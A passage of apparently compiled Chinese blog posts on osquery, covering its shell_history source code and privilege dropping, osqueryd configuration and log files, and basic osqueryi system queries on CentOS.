.bash_sessions中存储了特定SESSION的HISTFILE和.session文件。如果在启动shell时设置了$BASH_SESSION$TERM_SESSION_ID。当此特定的SESSION启动了之后就会利用$BASH_SESSION$TERM_SESSION_ID恢复之前的状态。这也说明在.bash_sessions目录下也会存在*.history用于记录特定SESSION的历史命令信息。

分析

QueryData genShellHistory(QueryContext& context) {
    QueryData results;
    // Iterate over each user
    QueryData users = usersFromContext(context);
    for (const auto& row : users) {
        auto uid = row.find("uid");
        auto gid = row.find("gid");
        auto dir = row.find("directory");
        if (uid != row.end() && gid != row.end() && dir != row.end()) {
            genShellHistoryForUser(uid->second, gid->second, dir->second, results);
            genShellHistoryFromBashSessions(uid->second, dir->second, results);
        }
    }

    return results;
}

分析shell_history.cpp的入口函数genShellHistory():

遍历所有的用户,拿到uidgiddirectory。之后调用genShellHistoryForUser()获取用户的shell记录genShellHistoryFromBashSessions()genShellHistoryForUser()作用类似。

genShellHistoryForUser():

void genShellHistoryForUser(const std::string& uid, const std::string& gid, const std::string& directory, QueryData& results) {
    auto dropper = DropPrivileges::get();
    if (!dropper->dropTo(uid, gid)) {
        VLOG(1) << "Cannot drop privileges to UID " << uid;
        return;
    }

    for (const auto& hfile : kShellHistoryFiles) {
        boost::filesystem::path history_file = directory;
        history_file /= hfile;
        genShellHistoryFromFile(uid, history_file, results);
    }
}

可以看到在执行之前调用了:

auto dropper = DropPrivileges::get();
if (!dropper->dropTo(uid, gid)) {
    VLOG(1) << "Cannot drop privileges to UID " << uid;
    return;
}

用于对giduid降权,为什么要这么做呢?后来询问外国网友,给了一个很详尽的答案:

Think about a scenario where you are a malicious user and you spotted a vulnerability(buffer overflow) which none of us has. In the code (osquery which is running usually with root permission) you also know that history files(controlled by you) are being read by code(osquery). Now you stored a shell code (a code which is capable of destroying anything in the system)such a way that it would overwrite the saved rip. So once the function returns program control is with the injected code(shell code) with root privilege. With dropping privilege you reduce the chance of putting entire system into danger.

There are other mitigation techniques (e.g. stack guard) to avoid above scenario but multiple defenses are required

简而言之,osquery一般都是使用root权限运行的,如果攻击者在.bash_history中注入了一段恶意的shellcode代码。那么当osquery读到了这个文件之后,攻击者就能够获取到root权限了,所以通过降权的方式就能够很好地避免这样的问题。

/**
* @brief The privilege/permissions dropper deconstructor will restore
* effective permissions.
*
* There should only be a single drop of privilege/permission active.
*/
virtual ~DropPrivileges();

可以看到当函数被析构之后,就会重新恢复对应文件的权限。

之后遍历kShellHistoryFiles文件,执行genShellHistoryFromFile()代码。kShellHistoryFiles在之前已经定义,内容是:

const std::vector<std::string> kShellHistoryFiles = {
    ".bash_history", ".zsh_history", ".zhistory", ".history", ".sh_history",
};

可以发现其实在kShellHistoryFiles定义的就是常见的bash用于记录shell history目录的文件。最后调用genShellHistoryFromFile()读取.history文件,解析数据。

void genShellHistoryFromFile(const std::string& uid, const boost::filesystem::path& history_file, QueryData& results) {
    std::string history_content;
    if (forensicReadFile(history_file, history_content).ok()) {
        auto bash_timestamp_rx = xp::sregex::compile("^#(?P<timestamp>[0-9]+)$");
        auto zsh_timestamp_rx = xp::sregex::compile("^: {0,10}(?P<timestamp>[0-9]{1,11}):[0-9]+;(?P<command>.*)$");
        std::string prev_bash_timestamp;
        for (const auto& line : split(history_content, "\n")) {
            xp::smatch bash_timestamp_matches;
            xp::smatch zsh_timestamp_matches;

            if (prev_bash_timestamp.empty() &&
                xp::regex_search(line, bash_timestamp_matches, bash_timestamp_rx)) {
                prev_bash_timestamp = bash_timestamp_matches["timestamp"];
                continue;
            }

            Row r;

            if (!prev_bash_timestamp.empty()) {
                r["time"] = INTEGER(prev_bash_timestamp);
                r["command"] = line;
                prev_bash_timestamp.clear();
            } else if (xp::regex_search(
                    line, zsh_timestamp_matches, zsh_timestamp_rx)) {
                std::string timestamp = zsh_timestamp_matches["timestamp"];
                r["time"] = INTEGER(timestamp);
                r["command"] = zsh_timestamp_matches["command"];
            } else {
                r["time"] = INTEGER(0);
                r["command"] = line;
            }

            r["uid"] = uid;
            r["history_file"] = history_file.string();
            results.push_back(r);
        }
    }
}

整个代码逻辑非常地清晰。

  1. forensicReadFile(history_file, history_content)读取文件内容。
  2. 定义bash_timestamp_rxzsh_timestamp_rx的正则表达式,用于解析对应的.history文件的内容。 for (const auto& line : split(history_content, "\n"))读取文件的每一行,分别利用bash_timestamp_rxzsh_timestamp_rx解析每一行的内容。
  3. Row r;...;r["history_file"] = history_file.string();results.push_back(r);将解析之后的内容写入到Row中返回。

自此就完成了shell_history的解析工作。执行select * from shell_history就会按照上述的流程返回所有的历史命令的结果。

对于genShellHistoryFromBashSessions()函数:

void genShellHistoryFromBashSessions(const std::string &uid,const std::string &directory,QueryData &results) {
    boost::filesystem::path bash_sessions = directory;
    bash_sessions /= ".bash_sessions";

    if (pathExists(bash_sessions)) {
        bash_sessions /= "*.history";
        std::vector <std::string> session_hist_files;
        resolveFilePattern(bash_sessions, session_hist_files);

        for (const auto &hfile : session_hist_files) {
            boost::filesystem::path history_file = hfile;
            genShellHistoryFromFile(uid, history_file, results);
        }
    }
}

genShellHistoryFromBashSessions()获取历史命令的方法比较简单。

  1. 获取到.bash_sessions/*.history所有的文件;
  2. 同样调用genShellHistoryFromFile(uid, history_file, results);方法获取到历史命令;

总结

阅读一些优秀的开源软件的代码,不仅能够学习到相关的知识更能够了解到一些设计哲学。拥有快速学习能⼒的⽩帽子,是不能有短板的。有的只是⼤量的标准板和⼏块长板。

使用osqueryd监控系统

0x01 说明

osquery初识主要是借由osqueryi的方式对osquery进行了一个基本的介绍。可以看到osqueryi是一个交互式的shell,我们可以很方便使用它进行测试,但是如果我们要将osquery投入实际使用,明显是osqueryd更加合适。本篇文章将详细地介绍osqueryd的使用。

0x02 osqueryd配置

如果使用osqueryi,我们可以通过osqueryi -audit_allow_config=true --audit_allow_sockets=true --audit_persist=true这样的方式传入设置。如果是osqueryd呢?其实我们安装好osquery之后,会以service的方式存在于系统中,同时可以利用systemctl的方式进行控制,其文件位于/usr/lib/systemd/system/osqueryd.service

[Unit]
Description=The osquery Daemon
After=network.service syslog.service

[Service]
TimeoutStartSec=0
EnvironmentFile=/etc/sysconfig/osqueryd
ExecStartPre=/bin/sh -c "if [ ! -f $FLAG_FILE ]; then touch $FLAG_FILE; fi"
ExecStartPre=/bin/sh -c "if [ -f $LOCAL_PIDFILE ]; then mv $LOCAL_PIDFILE $PIDFILE; fi"
ExecStart=/usr/bin/osqueryd \
  --flagfile $FLAG_FILE \
  --config_path $CONFIG_FILE
Restart=on-failure
KillMode=process
KillSignal=SIGTERM

[Install]
WantedBy=multi-user.target

启动方式就是ExecStart=/usr/bin/osqueryd --flagfile $FLAG_FILE --config_path $CONFIG_FILE,通过--flagfile--config_path的方式指定配置文件的路径。$FLAG_FILE和$CONFIG_FILE是在/etc/sysconfig/osqueryd中定义。

FLAG_FILE="/etc/osquery/osquery.flags"
CONFIG_FILE="/etc/osquery/osquery.conf"
LOCAL_PIDFILE="/var/osquery/osqueryd.pidfile"
PIDFILE="/var/run/osqueryd.pidfile"

默认的配置文件就是位于/etc/osquery/osquery.flags/etc/osquery/osquery.conf。当启动osqueryd时,如果不存在osquery.flagsosquery.conf会创建两个空文件,否则直接读取此文件的内容。其实osquery.conf可以认为是osquery.flags的超集,因为osquery.flags仅仅只是设置一些配置,而这些配置也同样可以在osquery.conf中实现,同时在osquery.conf中还可以配置osqueryd需要执行的SQL。所以接下来本文将仅仅只介绍osquery.conf的使用。

0x03 osquery.conf

osquery本身提供了一个osquery.conf的例子,其写法是一个JSON格式的文件,在这里我们将其简化一下。

{
  // Configure the daemon below:
  "options": {
    // Select the osquery config plugin.
    "config_plugin": "filesystem",

    // Select the osquery logging plugin.
    "logger_plugin": "filesystem",

    // The log directory stores info, warning, and errors.
    // If the daemon uses the 'filesystem' logging retriever then the log_dir
    // will also contain the query results.
    //"logger_path": "/var/log/osquery",

    // Set 'disable_logging' to true to prevent writing any info, warning, error
    // logs. If a logging plugin is selected it will still write query results.
    //"disable_logging": "false",

    // Splay the scheduled interval for queries.
    // This is very helpful to prevent system performance impact when scheduling
    // large numbers of queries that run a smaller or similar intervals.
    //"schedule_splay_percent": "10",

    // A filesystem path for disk-based backing storage used for events and
    // query results differentials. See also 'use_in_memory_database'.
    //"database_path": "/var/osquery/osquery.db",

    // Comma-delimited list of table names to be disabled.
    // This allows osquery to be launched without certain tables.
    //"disable_tables": "foo_bar,time",

    "utc": "true"
  },

  // Define a schedule of queries:
  "schedule": {
    // This is a simple example query that outputs basic system information.
    "system_info": {
      // The exact query to run.
      "query": "SELECT hostname, cpu_brand, physical_memory FROM system_info;",
      // The interval in seconds to run this query, not an exact interval.
      "interval": 3600
    }
  },

  // Decorators are normal queries that append data to every query.
  "decorators": {
    "load": [
      "SELECT uuid AS host_uuid FROM system_info;",
      "SELECT user AS username FROM logged_in_users ORDER BY time DESC LIMIT 1;"
    ]
  },
  "packs": {
    // "osquery-monitoring": "/usr/share/osquery/packs/osquery-monitoring.conf",
    ....
  }, 
}

osquery.conf文件大致可以分为4个部分。

  • options,配置选项,Command Line Flags基本上对所有的配置选项都进行了说明。其实osquery.flags所配置也是这个部分。这也是之前说的osquery.conf可以认为是osquery.flags的超集的原因;
  • schedule,配置SQL语句。因为osqueryd是以daemon的方式运行,所以需要通过在schedule中定义SQL语句使其定期执行返回结果;
  • decorators,中文意思是“装饰”。在decorators中也是定义了一系列的SQL语句,执行得到的结果会附加在是在执行schedule中的结果的后面;所以我们看到在decorators我们取的是uuid和登录的username
  • packs,就是一系列SQL语句的合集;

0x04 配置说明

上一节中对osquery.conf中的配置进了一个简单的说明,在本节中将详细说明。

options

  • options就是配置。Command Line Flags基本上对所有的配置选项都进行了说明。我们可以进行多种配置,有兴趣的可以自行研究。本节仅仅说明几个常用的配置;
  • config_plugin,配置选项是filesystem。如果是通过osquery.conf管理osquery就是采用filesystem,还有一种选项是tls(这一种主要是通过API的方式来配置osquery)。
  • logger_plugin,配置选项是filesystem,这也是osquery的默认值。根据Logger plugins,还可以配置tls,syslog (for POSIX,windows_event_log (for Windows),kinesis,firehose,kafka_producer
  • database_path,默认值是/var/osquery/osquery.db。因为osquery内部会使用到数据,所以配置此目录是osquery的数据库文件位置。
  • disable_logging,是配置设置osquery的结果是否需要保存到本地,这个配置其实和logger_plugin:filesystem有点重复。
  • hostIdentifier,相当于表示每个主机的标识,比如可以采用hostname作为标识。

schedule

schedule是osqeuryd用于写SQL语句的标签。其中的一个示例如下所示:

"system_info": {
    // The exact query to run.
    "query": "SELECT hostname, cpu_brand, physical_memory FROM system_info;",
    // The interval in seconds to run this query, not an exact interval.
    "interval": 3600
}

其中system_info是定义的一个SQL任务的名字,也是一个JSON格式。在其中可以进行多项设置,包括:

  1. query,定义需要执行的SQL语句;
  2. interval,定时执行的时间,示例中是3600,表示每隔3600秒执行一次;
  3. snapshot,可选选项,可以配置为snapshot:true。osquery默认执行的是增量模式,使用了snapshot则是快照模式。比如执行select * from processes;,osqeury每次产生的结果是相比上一次变化的结果;如果采用的是snapshot,则会显示所有的进程的,不会与之前的结果进行对比;
  4. removed,可选选项,默认值是true,用来设置是否记录actionremove的日志。

当然还有一些其他的不常用选项,如platformversionsharddescription等等。

更多关于schedule的介绍可以参考schedule

decorators

正如其注释Decorators are normal queries that append data to every query所说,Decorators会把他的执行结果添加到schedule中的sql语句执行结果中。所以根据其作用Decorators也不是必须存在的。。在本例中Decorators存在两条记录:

SELECT uuid AS host_uuid FROM system_info;
SELECT user AS username FROM logged_in_users ORDER BY time DESC LIMIT 1;
  1. SELECT uuid AS host_uuid FROM system_info,从system_info获取uuid作为标识符1;
  2. SELECT user AS username FROM logged_in_users ORDER BY time DESC LIMIT 1;,从logged_in_users选择user(其实查询的是用户名)的第一项作为标识符2;

当然可以在Decorators写多条语句作为标识符,但是感觉没有必要;

packs

packs就是打包的SQL语句的合集,本示例中使用的/usr/share/osquery/packs/osquery-monitoring.conf,这是官方提供的一个监控系统信息的SQL语句的集合;

{
  "queries": {
    "schedule": {
      "query": "select name, interval, executions, output_size, wall_time, (user_time/executions) as avg_user_time, (system_time/executions) as avg_system_time, average_memory, last_executed from osquery_schedule;",
      "interval": 7200,
      "removed": false,
      "blacklist": false,
      "version": "1.6.0",
      "description": "Report performance for every query within packs and the general schedule."
    },
    "events": {
      "query": "select name, publisher, type, subscriptions, events, active from osquery_events;",
      "interval": 86400,
      "removed": false,
      "blacklist": false,
      "version": "1.5.3",
      "description": "Report event publisher health and track event counters."
    },
    "osquery_info": {
      "query": "select i.*, p.resident_size, p.user_time, p.system_time, time.minutes as counter from osquery_info i, processes p, time where p.pid = i.pid;",
      "interval": 600,
      "removed": false,
      "blacklist": false,
      "version": "1.2.2",
      "description": "A heartbeat counter that reports general performance (CPU, memory) and version."
    }
  }
}

packs中的配置和schedule的配置方法并没有什么区别。我们在packs中查询到的信息包括:

  • osquery_schedule拿到osqueryd设置的schedule的配置信息;
  • osquery_events中拿到osqueryd所支持的所有的event
  • processesosquery_info中拿到进程相关的信息;

使用packs的好处是可以将一系列相同功能的SQL语句放置在同一个文件中;

0x05 运行osqueryd

当以上配置完毕之后,我们就可以通过sudo osqueryd的方式启动;如果我们设置logger_plugin:filesystem,那么日志就会落在本地/var/log/osquery下。此目录下包含了多个文件,每个文件分别记录不同的信息。

osqueryd.results.log,osqueryd的增量日志的信息都会写入到此文件中;保存结果的形式是JSON形式。示例如下:

{"name":"auditd_process_info","hostIdentifier":"localhost.localdomain","calendarTime":"Wed Oct 24 13:07:12 2018 UTC","unixTime":1540386432,"epoch":0,"counter":0,"decorations":{"host_uuid":"99264D56-9A4E-E593-0B4E-872FBF3CD064","username":"username"},"columns":{"atime":"1540380461","auid":"4294967295","btime":"0","cmdline":"awk { sum += $1 }; END { print 0+sum }","ctime":"1538239175","cwd":"\"/\"","egid":"0","euid":"0","gid":"0","mode":"0100755","mtime":"1498686768","owner_gid":"0","owner_uid":"0","parent":"4086","path":"/usr/bin/gawk","pid":"4090","time":"1540386418","uid":"0","uptime":"1630"},"action":"added"}
{"name":"auditd_process_info","hostIdentifier":"localhost.localdomain","calendarTime":"Wed Oct 24 13:07:12 2018 UTC","unixTime":1540386432,"epoch":0,"counter":0,"decorations":{"host_uuid":"99264D56-9A4E-E593-0B4E-872FBF3CD064","username":"username"},"columns":{"atime":"1540380461","auid":"4294967295","btime":"0","cmdline":"sleep 60","ctime":"1538240835","cwd":"\"/\"","egid":"0","euid":"0","gid":"0","mode":"0100755","mtime":"1523421302","owner_gid":"0","owner_uid":"0","parent":"741","path":"/usr/bin/sleep","pid":"4091","time":"1540386418","uid":"0","uptime":"1630"},"action":"added"}

其中的added表示的就是相当于上一次增加的进程信息;每一次执行的结果都是一条JSON记录;

squeryd.snapshots.log,记录的是osqueryd中使用snapshot:true标记的SQL语句执行结果;

{"snapshot":[{"header":"Defaults","rule_details":"!visiblepw"},{"header":"Defaults","rule_details":"always_set_home"},{"header":"Defaults","rule_details":"match_group_by_gid"},{"header":"Defaults","rule_details":"env_reset"},{"header":"Defaults","rule_details":"env_keep = \"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\""},{"header":"Defaults","rule_details":"env_keep += \"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\""},{"header":"Defaults","rule_details":"env_keep += \"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\""},{"header":"Defaults","rule_details":"env_keep += \"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\""},{"header":"Defaults","rule_details":"env_keep += \"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\""},{"header":"Defaults","rule_details":"secure_path = /sbin:/bin:/usr/sbin:/usr/bin"},{"header":"root","rule_details":"ALL=(ALL) ALL"},{"header":"%wheel","rule_details":"ALL=(ALL) ALL"}],"action":"snapshot","name":"sudoers","hostIdentifier":"localhost.localdomain","calendarTime":"Tue Oct  9 11:54:00 2018 UTC","unixTime":1539086040,"epoch":0,"counter":0,"decorations":{"host_uuid":"99264D56-9A4E-E593-0B4E-872FBF3CD064","username":"username"}}
{"snapshot":[{"header":"Defaults","rule_details":"!visiblepw"},{"header":"Defaults","rule_details":"always_set_home"},{"header":"Defaults","rule_details":"match_group_by_gid"},{"header":"Defaults","rule_details":"env_reset"},{"header":"Defaults","rule_details":"env_keep = \"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\""},{"header":"Defaults","rule_details":"env_keep += \"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\""},{"header":"Defaults","rule_details":"env_keep += \"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\""},{"header":"Defaults","rule_details":"env_keep += \"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\""},{"header":"Defaults","rule_details":"env_keep += \"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\""},{"header":"Defaults","rule_details":"secure_path = /sbin:/bin:/usr/sbin:/usr/bin"},{"header":"root","rule_details":"ALL=(ALL) ALL"},{"header":"%wheel","rule_details":"ALL=(ALL) ALL"}],"action":"snapshot","name":"sudoers","hostIdentifier":"localhost.localdomain","calendarTime":"Tue Oct  9 11:54:30 2018 UTC","unixTime":1539086070,"epoch":0,"counter":0,"decorations":{"host_uuid":"99264D56-9A4E-E593-0B4E-872FBF3CD064","username":"username"}}

由于snapshot是快照模式,所以即使两次结果相同也会全部显示出来;

osqueryd.INFO,记录osqueryd中正在运行的情况。示例如下:

Log file created at: 2018/11/22 17:06:06
Running on machine: osquery.origin
Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg
I1122 17:06:06.729902 22686 events.cpp:862] Event publisher not enabled: auditeventpublisher: Publisher disabled via configuration
I1122 17:06:06.730651 22686 events.cpp:862] Event publisher not enabled: syslog: Publisher disabled via configuration

osqueryd.WARNING,记录osquery的警告。示例如下:

Log file created at: 2018/10/09 19:53:45
Running on machine: localhost.localdomain
Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg
E1009 19:53:45.471046 104258 events.cpp:987] Requested unknown/failed event publisher: auditeventpublisher
E1009 19:53:45.471606 104259 events.cpp:987] Requested unknown/failed event publisher: inotify
E1009 19:53:45.471634 104260 events.cpp:987] Requested unknown/failed event publisher: syslog
E1009 19:53:45.471658 104261 events.cpp:987] Requested unknown/failed event publisher: udev

osqueryd.ERROR,记录的是osquery的错误信息。示例如下:

Log file created at: 2018/10/09 19:53:45
Running on machine: localhost.localdomain
Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg
E1009 19:53:45.471046 104258 events.cpp:987] Requested unknown/failed event publisher: auditeventpublisher
E1009 19:53:45.471606 104259 events.cpp:987] Requested unknown/failed event publisher: inotify
E1009 19:53:45.471634 104260 events.cpp:987] Requested unknown/failed event publisher: syslog
E1009 19:53:45.471658 104261 events.cpp:987] Requested unknown/failed event publisher: udev

在本例中错误信息和警告信息完全相同。在实际情况下,可能很多时候均不相同;

0x06 总结

本文主要是对osqueryd的常用配置进行了简要的说法。通过本文能够快速地利用上手osquery,由于篇幅的原因,有关osquery的很多东西没有介绍或者说明得很详细。官方的文档对osqueryd的配置已经说明得很是详尽了,如果对本文有任何的不解,可以去查阅相关的文档,也欢迎大家就相关问题与我讨论。

以上

osquery初识

0x01 说明

osquery是一个由FaceBook开源用于对系统进行查询、监控以及分析的一款软件。osquery对其的说明如下:

osquery exposes an operating system as a high-performance relational database. This allows you to write SQL-based queries to explore operating system data. With osquery, SQL tables represent abstract concepts such as running processes, loaded kernel modules, open network connections, browser plugins, hardware events or file hashes.

我们知道当你们在Linux中使用诸如pstopls -l等等命令的时候,可以发下其实他们的输出结果的格式都是很固定的很像一张表。或许是基于这样的想法,facebook开发了osquery。osquery将操作系统当作是一个高性能的关系型数据库。使用osquery运行我们能够使用类似于SQL语句的方式去查询数据库中的信息,比如正在运行的进程信息,加载的内核模块,网络连接,浏览器插件等等信息(一切查询的信息的粒度取决于osquery的实现粒度了)。

osquery也广泛地支持多个平台,包括MacOS、CentOS、Ubuntu、Windows 10以及FreeBSD,具体所支持的版本的信息也可以在osquery主页查看。除此之外,osquery的配套文档/网站也是一应俱全,包括主页Githubreadthedocsslack

本篇文章以CentOS为例说明Osquery的安装以及使用。

0x02 安装

主页上面提供了不同操作系统的安装包,我们下载CentOS对应的rpm文件即可。在本例中文件名是osquery-3.3.0-1.linux.x86_64.rpm,使用命令sudo yum install osquery-3.3.0-1.linux.x86_64.rpm安装。安装成功之后会出现:

Installed:
  osquery.x86_64 0:3.3.0-1.linux                                                                                                                                                             
Complete!

0x03 运行

osquery存在两种运行模式,分别是osqueryi(交互式模式)、osqueryd(后台进程模式)。

  • osqueryi,与osqueryd安全独立,不需要以管理员的身份运行,能够及时地查看当前操作系统的状态信息。
  • osqueryd,我们能够利用osqueryd执行定时查询记录操作系统的变化,例如在第一次执行和第二次执行之间的进程变化(增加/减少),osqueryd会将进程执行的结果保存(文件或者是直接打到kafka中)。osqueryd还会利用操作系统的API来记录文件目录的变化、硬件事件、网络行为的变化等等。osqueryd在Linux中是以系统服务的方式来运行。

为了便于演示,我们使用osqueyi来展示osquery强大的功能。我们直接在terminal中输入osqueryi即可进入到osqueryi的交互模式中(osqueryi采用的是sqlite的shell的语法,所以我们也可以使用在sqlite中的所有的内置函数)。

[user@localhost Desktop]$ osqueryi
Using a virtual database. Need help, type '.help'
osquery> .help
Welcome to the osquery shell. Please explore your OS!
You are connected to a transient 'in-memory' virtual database.

.all [TABLE]     Select all from a table
.bail ON|OFF     Stop after hitting an error
.echo ON|OFF     Turn command echo on or off
.exit            Exit this program
.features        List osquery's features and their statuses
.headers ON|OFF  Turn display of headers on or off
.help            Show this message
.mode MODE       Set output mode where MODE is one of:
                   csv      Comma-separated values
                   column   Left-aligned columns see .width
                   line     One value per line
                   list     Values delimited by .separator string
                   pretty   Pretty printed SQL results (default)
.nullvalue STR   Use STRING in place of NULL values
.print STR...    Print literal STRING
.quit            Exit this program
.schema [TABLE]  Show the CREATE statements
.separator STR   Change separator used by output mode
.socket          Show the osquery extensions socket path
.show            Show the current values for various settings
.summary         Alias for the show meta command
.tables [TABLE]  List names of tables
.width [NUM1]+   Set column widths for "column" mode
.timer ON|OFF      Turn the CPU timer measurement on or off

通过.help,我们能够查看在osqueryi模式下的一些基本操作。比如.exit表示退出osqueryi,.mode切换osqueryi的输出结果,.show展示目前osqueryi的配置信息,.tables展示在当前的操作系统中能够支持的所有的表名。.schema [TABLE]显示具体的表的结构信息。

osquery> .show
osquery - being built, with love, at Facebook

osquery 3.3.0
using SQLite 3.19.3

General settings:
     Flagfile: 
       Config: filesystem (/etc/osquery/osquery.conf)
       Logger: filesystem (/var/log/osquery/)
  Distributed: tls
     Database: ephemeral
   Extensions: core
       Socket: /home/xingjun/.osquery/shell.em

Shell settings:
         echo: off
      headers: on
         mode: pretty
    nullvalue: ""
       output: stdout
    separator: "|"
        width: 

Non-default flags/options:
  database_path: /home/xingjun/.osquery/shell.db
  disable_database: true
  disable_events: true
  disable_logging: true
  disable_watchdog: true
  extensions_socket: /home/xingjun/.osquery/shell.em
  hash_delay: 0
  logtostderr: true
  stderrthreshold: 3

可以看到设置包括常规设置(General settings)、shell设置(Shell settings)、非默认选项(Non-default flags/options)。在常规设置中主要是显示了各种配置文件的位置(配置文件/存储日志文件的路径)。 在shell设置中包括了是否需要表头信息(headers),显示方式(mode: pretty),分隔符(separator: "|")。

.table可以查看在当前操作系统中所支持的所有的表,虽然在schema中列出了所有的表(包括了win平台,MacOS平台,Linux平台)。但是具体到某一个平台上面是不会包含其他平台上的表。下方显示的就是我在CentOS7下显示的表。

osquery> .table
  => acpi_tables
  => apt_sources
  => arp_cache
  => augeas
  => authorized_keys
  => block_devices
  => carbon_black_info
  => carves
  => chrome_extensions
  => cpu_time
  => cpuid
  => crontab
...

.schema [TABLE]可以用于查看具体的表的结构信息。如下所示:

osquery> .schema users
CREATE TABLE users(`uid` BIGINT, `gid` BIGINT, `uid_signed` BIGINT, `gid_signed` BIGINT, `username` TEXT, `description` TEXT, `directory` TEXT, `shell` TEXT, `uuid` TEXT, `type` TEXT HIDDEN, PRIMARY KEY (`uid`, `username`)) WITHOUT ROWID;
osquery> .schema processes
CREATE TABLE processes(`pid` BIGINT, `name` TEXT, `path` TEXT, `cmdline` TEXT, `state` TEXT, `cwd` TEXT, `root` TEXT, `uid` BIGINT, `gid` BIGINT, `euid` BIGINT, `egid` BIGINT, `suid` BIGINT, `sgid` BIGINT, `on_disk` INTEGER, `wired_size` BIGINT, `resident_size` BIGINT, `total_size` BIGINT, `user_time` BIGINT, `system_time` BIGINT, `disk_bytes_read` BIGINT, `disk_bytes_written` BIGINT, `start_time` BIGINT, `parent` BIGINT, `pgroup` BIGINT, `threads` INTEGER, `nice` INTEGER, `is_elevated_token` INTEGER HIDDEN, `upid` BIGINT HIDDEN, `uppid` BIGINT HIDDEN, `cpu_type` INTEGER HIDDEN, `cpu_subtype` INTEGER HIDDEN, `phys_footprint` BIGINT HIDDEN, PRIMARY KEY (`pid`)) WITHOUT ROWID;

上面通过.schema查看usersprocesses表的信息,结果输出的是他们对应的DDL。

0x03 基本使用

在本章节中,将会演示使用osqueryi来实时查询操作系统中的信息(为了方便展示查询结果使用的是.mode line模式)。

查看系统信息

osquery> select * from system_info;
          hostname = localhost
              uuid = 4ee0ad05-c2b2-47ce-aea1-c307e421fa88
          cpu_type = x86_64
       cpu_subtype = 158
         cpu_brand = Intel(R) Core(TM) i5-8400 CPU @ 2.80GHz
cpu_physical_cores = 1
 cpu_logical_cores = 1
     cpu_microcode = 0x84
   physical_memory = 2924228608
   hardware_vendor = 
    hardware_model = 
  hardware_version = 
   hardware_serial = 
     computer_name = localhost.localdomain
    local_hostname = localhost

查询的结果包括了CPU的型号,核数,内存大小,计算机名称等等;

查看OS版本

osquery> select * from os_version;
         name = CentOS Linux
      version = CentOS Linux release 7.4.1708 (Core)
        major = 7
        minor = 4
        patch = 1708
        build = 
     platform = rhel
platform_like = rhel
     codename =

以看到我的本机的操作系统的版本是CentOS Linux release 7.4.1708 (Core)

查看内核信息版本

osquery> SELECT * FROM kernel_info;
  version = 3.10.0-693.el7.x86_64
arguments = ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8
     path = /vmlinuz-3.10.0-693.el7.x86_64
   device = /dev/mapper/centos-root

osquery> SELECT * FROM kernel_modules LIMIT 3;
   name = tcp_lp
   size = 12663
used_by = -
 status = Live
address = 0xffffffffc06cf000

   name = fuse
   size = 91874
used_by = -
 status = Live
address = 0xffffffffc06ae000

   name = xt_CHECKSUM
   size = 12549
used_by = -
 status = Live
address = 0xffffffffc06a9000

查询repo和pkg信息

osquery提供查询系统中的repo和okg相关信息的表。在Ubuntu中对应的是apt相关的包信息,在Centos中对应的是yum相关的包信息。本例均以yum包为例进行说明

osquery> SELECT * FROM yum_sources  limit 2;
    name = CentOS-$releasever - Base
 baseurl = 
 enabled = 
gpgcheck = 1
  gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

    name = CentOS-$releasever - Updates
 baseurl = 
 enabled = 
gpgcheck = 1
  gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

我们可以直接利用yum_sources来查看操作系统的yum源相关的信息。

osquery> SELECT name, version FROM rpm_packages order by name limit 3;
   name = GConf2
version = 3.2.6

   name = GeoIP
version = 1.5.0

   name = ModemManager
version = 1.6.0

利用rpm_packages查看系统中已经安装的rpm包信息。我们也可以通过name对我们需要查询的包进行过滤,如下:

osquery> SELECT name, version FROM rpm_packages where name="osquery";
   name = osquery
version = 3.3.0

挂载信息

我们可以使用mounts表来查询系统中的具体的驱动信息。例如我们可以如下的SQL语句进行查询:

SELECT * FROM mounts;
SELECT device, path, type, inodes_free, flags FROM mounts;

我们也可以使用where语句查询摸一个具体的驱动信息,例如ext4或者是tmpfs信息。如下:

osquery> SELECT device, path, type, inodes_free, flags FROM mounts WHERE type="ext4";
osquery> SELECT device, path, type, inodes_free, flags FROM mounts WHERE type="tmpfs";
     device = tmpfs
       path = /dev/shm
       type = tmpfs
inodes_free = 356960
      flags = rw,seclabel,nosuid,nodev

     device = tmpfs
       path = /run
       type = tmpfs
inodes_free = 356386
      flags = rw,seclabel,nosuid,nodev,mode=755

     device = tmpfs
       path = /sys/fs/cgroup
       type = tmpfs
inodes_free = 356945
      flags = ro,seclabel,nosuid,nodev,noexec,mode=755

     device = tmpfs
       path = /run/user/42
       type = tmpfs
inodes_free = 356955
      flags = rw,seclabel,nosuid,nodev,relatime,size=285572k,mode=700,uid=42,gid=42

     device = tmpfs
       path = /run/user/1000
       type = tmpfs
inodes_free = 356939
      flags = rw,seclabel,nosuid,nodev,relatime,size=285572k,mode=700,uid=1000,gid=1000

内存信息

使用memory_info查看内存信息,如下:

osquery> select * from memory_info;
memory_total = 2924228608
 memory_free = 996024320
     buffers = 4280320
      cached = 899137536
 swap_cached = 0
      active = 985657344
    inactive = 629919744
  swap_total = 2684350464
   swap_free = 2684350464

网卡信息

使用interface_addresses查看网卡信息,如下:

osquery> SELECT * FROM interface_addresses;
     interface = lo
       address = 127.0.0.1
          mask = 255.0.0.0
     broadcast = 
point_to_point = 127.0.0.1
          type = 

     interface = virbr0
       address = 192.168.122.1
          mask = 255.255.255.0
     broadcast = 192.168.122.255
point_to_point = 
          type = 

     interface = lo
       address = ::1
